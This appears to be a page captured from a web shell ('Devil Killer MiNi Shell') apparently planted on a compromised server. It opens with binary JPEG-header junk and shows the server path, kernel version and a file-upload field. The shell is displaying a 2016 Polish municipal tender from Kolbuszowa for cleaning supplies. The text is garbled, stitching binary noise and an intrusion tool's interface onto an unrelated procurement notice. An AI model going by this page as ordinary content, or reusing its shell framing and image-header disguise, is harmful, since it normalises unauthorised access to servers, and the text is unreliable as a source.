JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161201/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161201/356678-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.kolbuszowa.pl' target='_blank'>http://www.bip.kolbuszowa.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 356678 - 2016
              z dnia 2016-12-01 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kolbuszowa: Dostawa artykułów i środków czystości dla Gminy Kolbuszowa i jej jednostek organizacyjnych<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Kolbuszowa, krajowy numer identyfikacyjny
              690581666, ul.
              ul. Obrońców Pokoju 
              21,
              36-100 
              Kolbuszowa, woj.
              podkarpackie, państwo
              Polska, tel.
              +48172271333, e-mail
              monika.fryzel@kolbuszowa.pl, faks
              +48172272939.
              <br />
              Adres strony internetowej (URL): www.kolbuszowa.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.kolbuszowa.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.kolbuszowa.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Osobiście, za pomocą operatora pocztowego, za pośrednictwem kuriera<br />
                Adres:
                <br />Urząd Miejski w Kolbuszowej, ul. Obrońców Pokoju 21, 36-100 Kobuszowa, pok. nr 13 (sekretariat)</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa artykułów i środków czystości dla Gminy Kolbuszowa i jej jednostek organizacyjnych<br /><b>Numer referencyjny: </b>ZP.271.1.34.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia pn.: Dostawa artykułów i środków czystości dla Gminy Kolbuszowa i jej jednostek organizacyjnych jest dostawa artykułów i środków czystości dla Gminy Kolbuszowa i jej jednostek organizacyjnych w 2017 r.
Płyn do ręcznego mycia naczyń  produkt przeznaczony do mycia naczyń kuchennych i urządzeń w gastronomi mających kontakt z żywnością. Usuwa tłuszcz, brud i bakterie. Wysoko skoncentrowany, gęsty, pozostawia przyjemny zapach. Produkt dopuszczony do stosowania w zakładach przemysłu spożywczego, gastronomii, do powierzchni mających kontakt 
z żywnością. Produkt zgodny z wymogami UE. Produkt posiada kartę charakterystyki w języku polskim dostarczoną wraz z nim przy pierwszej dostawie,
Mydło w płynie  o silnym działaniu bakteriobójczym. Produkt zawierający substancje o właściwościach pielęgnacyjnych typu lanolina. Produkt zgodny 
z wymogami UE. Produkt posiada kartę charakterystyki w języku polskim dostarczoną wraz z nim przy pierwszej dostawie.
Płyn do zmywarki  niepieniący płyn do czyszczenia naczyń i urządzeń ze stali szlachetnej, aluminium, wyrobów ceramicznych oraz z tworzywa sztucznego. Dokładnie usuwa z naczyń, szklanek i urządzeń kuchennych zaschnięte resztki jedzenia i napojów. Skutecznie czyści zabrudzenia z herbaty, kawy, kakao 
i inne o podobnie o intensywnym zabarwieniu plamy, rozpuszcza tłuszcze. Posiada właściwości wybielające. Produkt zgodny z wymogami UE. Produkt posiada kartę charakterystyki w języku polskim dostarczą wraz z nim przy pierwszej dostawie.
Nabłyszczacz do zmywarek  środek działa nabłyszczająco i umożliwia szybsze wysychanie bez zacieków i plam. Zawiera środek zabezpieczający przed osadzaniem kamienia na mytych naczyniach. Produkt zgodny 
z wymogami UE. Produkt posiada kartę charakterystyki w języku polskim dostarczoną wraz z nim przy pierwszej dostawie.
Mleczko do czyszczenia  skutecznie usuwa uporczywy brud, osady 
z kamienia, przypalone resztki, pleśń, mydło, osady z rdzy oraz uporczywe zabrudzenia pochodzenia tłuszczowego. Nie rysuje powierzchni, łatwo się spłukuje, pozostawia przyjemny zapach. Nie wpływa ujemnie na czyszczone powierzchnie, nie powoduje korozji, nie niszczy powierzchni lakierowanych. Produkt zgodny z wymogami UE. Produkt posiada kartę charakterystyki w języku polskim dostarczoną wraz z nim przy pierwszej dostawie.
Płyn do dezynfekcji bezpośredniej  gotowy do użycia preparat przeznaczony do mycia i dezynfekcji urządzeń technologicznych, na bazie alkoholu, nie wymaga spłukiwania. Preparat wykazuje działanie bakteriobójcze, bójczy 
i wobec grzybów drożdżopodobnych. W stężeniach użytkowych nie posiada zapachy, nie wpływa ujemnie na dezynfekowane powierzchnie (nie powoduje korozji, nie niszczy powierzchni lakierowanych, itp.), nie jest toksyczny, nie podrażnia  błon śluzowych i skóry rak, z rozpylaczem. Produkt zgodnym 
z wymogami UE. Produkt posiada kartę charakterystyki w języku polskim dostarczoną wraz z nim przy pierwszej dostawie.
Płynny preparat do mycia i dezynfekcji urządzeń chłodniczych i zamrażarek  o działaniu bakteriobójczym i wirusbójczym. Nie wpływa ujemnie 
na dezynfekowane powierzchnie, nie powoduje korozji, nie niszczy powierzchni lakierowanych. Dopuszczony do stosowania do stosowania 
z zakładach przemysłu spożywczego, gastronomi, do powierzchni mających kontakt z żywnością. Produkt zgodny z wymogami UE. Produkt posiada kartę charakterystyki w języku polskim dostarczaną wraz z nim przy pierwszej dostawie.
Proszek do prania  do białego. Do prania w pralkach automatycznych. Usuwa brud już w temperaturze 300C, Przystosowany do prania w temperaturze do 900C. Produkt zgodny z wymogami UE.
Proszek do prania  do kolorowego. Do prania w pralkach automatycznych. Usuwa brud już w temperaturze 300C, Przystosowany do prania 
w temperaturze do 900C. Produkt zgodny z wymogami UE.
Wybielacz  koncentrat. Do białych tkanin bawełnianych, syntetycznych, lnianych. Usuwa plamy. Produkt zgodny z wymogami UE.
Odplamiacz do kolorów  likwiduje uporczywe plamy oraz wzmacnia skuteczność proszku do prania. Bezpieczny do użycia na tkaninach białych 
i kolorowych. Do prania w pralce. Produkt zgodny z wymogami UE. Produkt posiada kartę charakterystyki w języku polskim dostarczoną wraz z nim przy pierwszej dostawie.
Preparat do mycia podłóg  środek przeznaczony do gruntowego ręcznego mycia wszelkich wodoodpornych powierzchni, posiadający właściwości odtłuszczająco-dezynfekujące. Dopuszczony do stosowania w zakładach przemysłu spożywczego, gastronomii. Produkt zgodny z wymogami UE. Produkt posiada kartę charakterystyki w języku polskim dostarczaną wraz 
z nim przy pierwszej dostawie.
Preparat do mycia podłóg  środek myjąco-konserwujący, zapachowy, przeznaczony do gruntowego ręcznego mycia wszelkich wodoodpornych powierzchni. Koncentrat do rozcieńczania. Produkt posiada kartę charakterystyki w języku polskim dostarczoną wraz z nim przy pierwszej dostawie.
Płyn do podłóg drewnianych  skuteczności czyści i usuwa kurz, odżywia, odświeża i pielęgnuje podłogi nie pozostawiając smug. Produkt zgodny 
z wymogami UE.
Płynny skoncentrowany preparat do mycia toalet  środek do dezynfekcji 
i pielęgnacji odpornych na kwasy powierzchni (muszle klozetowe, zlewozmywaki, armatura metalowa). Czyści usuwając naloty rdzy, kamienia moczowego, nacieki wodne, bakteriobójcze. Produkt zgodny z wymogami UE. Produkt posiada kartę charakterystyki w języku polskim dostarczoną wraz 
z nim przy pierwszej dostawie.
Płyn do szyb  przeznaczony do mycia wszystkich powierzchni szklanych, skutecznie usuwa tłuszcz i brud. Wysycha szybko i bez smugowo. Opakowanie z automizerem. Produkt zgodny z wymogami UE. Produkt posiada kartę charakterystyki w języku polskim dostarczoną wraz z nim przy pierwszej dostawie.
Środek do czyszczenia i konserwacji w sprayu  czyści oraz przywraca naturalny wygląd drewnianym meblom. Produkt przeznaczony do stosowania na wszystkich zabezpieczonych powierzchni drewnianych. Produkt zgodny 
z wymogami UE.
Środek do udrażniania rur  rozpuszcza zanieczyszczenia stałe (organiczne), udrażnia wszelkie zatory w rurach i odpływach kanalizacyjnych. Dociera do wszystkich zakamarków, nawet przez stojącą wodę, bezpieczny dla wszystkich rodzajów rur (metalowych i plastykowych). Usuwa bakterie i nieprzyjemny zapach. Produkt zgodny z wymogami UE, posiadający kartę charakterystyki 
w języku polskim dostarczoną wraz z nim przy pierwszej dostawie.
Odkamieniacz  Profesjonalny środek do czyszczenia urządzeń gastronomicznych i innych elementów odpornych na działania kwasów. Doskonale usuwa wszelkie osady mineralne nagrodzone w trakcie eksploatacji urządzeń, jak i ogranicza ich późniejsze osadzenia. Gwarantuje odpowiednią higienę czyszczonych urządzeń oraz optymalną ich wydajność. Idealnie sprawdza się jako odkamieniacz do zmywarek, podgrzewaczy, czajników, grzałek elektrycznych, pralek, ekspresów do kawy itp. Działa szybko 
i skutecznie. Produkt nie działa szkodliwie na czyszczone powierzchnie. Można stosować do powierzchni ze stali nierdzewnej. Środek nisko pieniący. Produkt zgodny z wymogami UE. Produkt posiada kartę charakterystyki 
w języku polskim dostarczoną wraz z nim przy pierwszej dostawie.
Kostka toaletowa  dwuwarstwowa z zawieszką. Specjalnie dobrane składniki kostki myją muszlę klozetową oraz zapobiegają odkładaniu się osadów przy każdorazowym spłukiwaniu tworzą obfitą pianę i wydzielają odświeżający zapach. Minimalna waga kostki bez zawieszki 40 g. Produkt zgodny 
z wymogami UE. Produkt posiada kartę charakterystyki w języku polskim dostarczoną wraz z nim przy pierwszej dostawie.
Zmiotka + szufelka  jednostka miary: komplet.
Wiadro  Wyposażone w sztywny, wytrzymały wyciskacz,
Szczotka do zamiatania podłogi  drewniana lub plastikowa o długości od 30 cm do 40 cm, bez trzonka, z gwintem do mocowania trzonka;
Rękawice gumowe  gospodarcze, flokowane,
Ścierka tetrowa  100% bawełny.
Ścierka do podłogi z mikrofibry  Do wielokrotnego prania, przeznaczona 
do mycia i wycierania wszelkich rodzajów podłóg, parkietów, płytek, paneli, podłóg z tworzywa stycznego.
Szczotka do WC z ociekaczem  jednostka miary: komplet,
MOP płaski  końcówka bawełniana o długości 40 cm z bocznymi kieszonkami do mocowania,
MOP bawełniany  Chłonny, czyści najgorsze zabrudzenia. Końcówka 
z gwintem do wkręcania trzonka.
Trzonek drewniany  - do szczotki lub MOP.
Szczotka ryżowa  drewniana lub plastikowa z gęstym, krótkim włosiem.
Rękawice lateksowe  z rolowanym brzegiem, przeznaczone do kontaktu 
z żywością, Produkt zgodny z wymogami UE,
Rękawice gumowe  grube, rozmiar S, M lub L. 
ruciak, zmywak spiralny ze stali nierdzewnej  Do czyszczenia silnie zabrudzonych powierzchni, usuwania kamienia, przypaleń,
Papier toaletowy  jednowarstwowy, 100% makulatury, min. 33g/m2. Minimalna ilość listków w rolce 200;
Papier toaletowy  dwuwarstwowy, 100% celuloza, wytrzymały, biały,
Ręcznik Z-Z  standardowa jakość. Rozmiar listka minimum 200 m x 240 mm, opakowanie karton, ilość listków w opakowaniu do 5000 szt. jednowarstwowy,
Ścierka domowa  do wielokrotnego prania. Wysoka chłonność, do wszelkiego rodzaju zabrudzeń.
Gąbka, zmywak profilowany do naczyń  z uchwytem  wyżłobieniami ułatwiającymi trzymanie zmywaka.
Folia aluminiowa  spożywcza, Produkt dopuszczony do użytku na terenie RP, co potwierdzenia karta charakterystyki dostarczona wraz z nim przy pierwszej dostawie,
Worki foliowe  grube, na odpadki, jednorazowe, o pojemności 120 l. Produkt dopuszczony do użytku na terenie RP, co potwierdza karta charakterystyki dostarczona wraz z nim przy pierwszej dostawie,
Worki foliowe  grube, na odpadki, jednorazowe, o pojemności 60 l. Produkt dopuszczony do użytku na terenie RP, co potwierdza karta charakterystyki dostarczona wraz z nim przy pierwszej dostawie,
Worki foliowe  grube, na odpadki, jednorazowe, o pojemności 35 l. Produkt dopuszczony do użytku na terenie RP, co potwierdza karta charakterystyki dostarczona z nim przy pierwszej dostawie.
Oraz pozostałe artykuły i środki czystości które nie zostały wymienione.
<br /><br /><b>II.5) Główny kod CPV: </b>33711900-6<br /><b> Dodatkowe kody CPV:</b>33761000-2,
                33763000-6,
                39812400-1,
                39813000-4,
                39800000-0,
                39830000-9,
                39831200-8,
                39831210-1,
                39831230-7,
                39831240-0,
                39831250-3,
                39831300-9,
                39831600-2,
                39833000-0<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>lub do wyczerpania środków, w zależności co nastąpi pierwsze</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykazu wykonanych głównych dostaw wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat  wykonania 
i podmiotów na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami 
o których mowa są referencje lub inne dokumenty wystawione przez podmiot, 
na rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny 
o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy.
W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału 
w postępowaniu zamawiający żąda od Wykonawcy stosownego oświadczenia wg. wzoru stanowiącego Rozdział II SIWZ Załącznik nr 2 do oferty oraz:
aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu zamawiający żąda od Wykonawcy stosowanego oświadczenia wg. wzoru stanowiącego Rozdział II SIWZ Załącznik nr 2</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy: - spełniają warunki udziału w postępowaniu dotyczące: celu potwierdzenia spełnienia warunków udziału w postępowaniu zamawiający żąda od Wykonawcy stosownego oświadczenia wg. wzoru stanowiącego Rozdział II SIWZ Załącznik nr 3<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Do wypełnionego i podpisanego formularza oferty należy dołączyć:

a)	aktualne na dzień składnia ofert oświadczenie dotyczące przesłanek wykluczenia 
z postępowania  wzór stanowi Rozdział II załącznik nr 2 SIWZ
b)	aktualne na dzień składnia ofert oświadczenie o spełnianiu warunków udziału 
w postępowaniu  wzór stanowi Rozdział II załącznik nr 3 SIWZ 
